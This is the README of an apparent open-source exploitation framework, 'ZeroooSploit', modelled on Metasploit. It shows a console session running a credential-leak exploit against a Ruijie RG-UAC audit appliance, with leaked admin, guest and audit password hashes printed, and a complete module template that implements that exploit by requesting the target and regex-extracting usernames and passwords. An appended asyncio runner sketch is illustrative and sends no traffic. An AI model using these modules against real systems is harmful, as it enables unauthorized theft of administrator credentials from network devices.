Amzza0x00 / Zerooo-Exploitation-Framework

Licence: GPL-3.0 License
Asynchronous vulnerability exploitation framework

ZeroooSploit - Exploitation Framework

Vulnerability exploitation framework

Installation

Required modules:

  • aiohttp

Running

git clone https://github.com/Amzza0x00/Zerooo-Exploitation-Framework.git
cd Zerooo-Exploitation-Framework
python3 console.py

                                                 _       _ _ 1.0.0#dev
 _______ _ __ ___   ___   ___  ___ _ __ | | ___ (_) |_
|_  / _ \ r'__/ _ \ / _ \ / _ \/ __| '_ \| |/ _ \| | __|
 / /  __/ | | (_) | (_) | (_) \__ \ |_) | | (_) | | |_
/___\___|_|  \___/ \___/ \___/|___/ .__/|_|\___/|_|\__|
                                  |_|

        Zerooo Exploitation Framework

+ -- --=[ 5 exploits - 4 auxiliary       ]



zsf > setg proxy http://127.0.0.1:7890
2021/06/15 16:14:34 [*] proxy => http://127.0.0.1:7890
zsf > use exploit/ruijie/rg-uac-passleak
zsf (rg-uac-passleak) > show options

Module options (exploit/ruijie/rg-uac-passleak):

Name           Current Setting                    Required        Description
----           ---------------                    --------        -----------
targets        https://192.168.1.2:3001           yes             目标url,多个目标请用,分开


zsf (rg-uac-passleak) > run
2021/06/12 16:14:49 [*] Running module exploit/ruijie/rg-uac-passleak...
2021/06/12 16:14:49 [*] Current task 1
2021/06/12 16:15:12 [+] name:admin,password:8b6ebdca5ad9f22c64a831f9ab262159
2021/06/12 16:15:12 [+] name:guest,password:fcf41657f02f88137a1bcf068a32c0a3
2021/06/12 16:15:12 [+] name:audit,password:d33542b8458db8cabd9843fe7c1e8784
2021/06/12 16:15:12 [*] exploit complete
zsf (rg-uac-passleak) >

Template

Basic structure

import re

from zerooo.core.asyncpool import async_run  # runs the coroutines
from zerooo.core.log import LOGGER  # coloured output
from zerooo.core.options import Option  # set and get module options
from zerooo.request.httpclient import HttpClient  # asynchronous HTTP requests
from zerooo.utils.util import get_target  # splits a multi-target string


# Define the Zerooosploit class, inheriting from Option
class Zerooosploit(Option):

    def __init__(self):
        super().__init__()
        self.info = {
            'Name': '锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露',  # module name
            'Module': 'exploit/ruijie/rg-uac-passleak',  # module path
            'Product': '锐捷RG-UAC统一上网行为管理审计系统',  # product
            'Cve': '',  # CVE number
            'Create_date': '20210411',  # creation date
            'Description': '锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台',  # description
            'Authors': '',  # authors
            'References': ''  # reference links
        }

        # Register the options the module needs.
        # Current Setting: default value; Required: optional or required;
        # Description: what the option means.
        self.option = {
            'targets': {'Current Setting': '', 'Required': 'yes', 'Description': '目标url,多个目标请用,分开'},
        }

    # "async def" defines the coroutine that is run once per target
    async def rg_uac_passleak(self, target):
        # Request method, path, and so on
        resp = await HttpClient().send_request_cgi('GET', url=target)
        return resp

    # Callback invoked when a coroutine finishes; it processes the result
    def rg_uac_passleak_callback(self, future):
        resp = future.result()
        if resp['code'] == 200:
            result = resp['text']
            users = re.findall('"name":"(.*?)"', result)
            passwords = re.findall('"password":"(.*?)"', result)
            # zip() stops at the shorter list, so unequal match counts cannot raise IndexError
            for user, password in zip(users, passwords):
                msg = f'name:{user},password:{password}'
                LOGGER.success(msg)

        else:
            msg = 'The target ' + str(resp['url']) + ' not vuln !'
            LOGGER.info(msg)

    # Entry point called by "run"
    def exploit(self):
        # Call get_options to read the option value
        targets = get_target(self.get_options('targets'))
        # async_run: arg1 is the coroutine function, arg2 an iterable of targets, arg3 the callback
        async_run(self.rg_uac_passleak, targets, self.rg_uac_passleak_callback)
        LOGGER.info('exploit complete')
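
The template relies on the three-argument contract of async_run (coroutine function, iterable, done-callback). The sketch below is an added example, not the project's own zerooo.core.asyncpool code, showing one way such a runner can be built on asyncio and why a callback should check future.exception() before calling future.result(). The `limit` parameter, `fake_request`, `demo` and the example.test URLs are assumptions constructed for illustration; no network traffic is sent.

```python
import asyncio


def async_run(coro_func, items, callback, limit=10):
    """Hypothetical runner: call coro_func(item) for every item, at most
    `limit` at a time, and pass each finished task to callback(future)."""
    async def _main():
        sem = asyncio.Semaphore(limit)

        async def _guarded(item):
            async with sem:
                return await coro_func(item)

        tasks = []
        for item in items:
            task = asyncio.ensure_future(_guarded(item))
            task.add_done_callback(callback)
            tasks.append(task)
        # return_exceptions=True: one failing item must not abort the others
        await asyncio.gather(*tasks, return_exceptions=True)

    asyncio.run(_main())


async def fake_request(target):
    """Constructed stand-in for an HTTP call; returns a dict shaped like resp."""
    await asyncio.sleep(0)
    if target.endswith("/down"):
        raise ConnectionError(f"{target} unreachable")
    return {"url": target, "code": 200 if target.endswith("/ok") else 404}


def demo():
    ok, failed = [], []

    def on_done(future):
        # future.result() re-raises the coroutine's exception, so test first
        exc = future.exception()
        if exc is not None:
            failed.append(str(exc))
        else:
            result = future.result()
            ok.append((result["url"], result["code"]))

    targets = ["http://a.example.test/ok", "http://b.example.test/down",
               "http://c.example.test/missing"]  # constructed sample input
    async_run(fake_request, targets, on_done, limit=2)
    return sorted(ok), failed
```
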


Feedback

Issues are welcome

References

RouterSploit
Metasploit
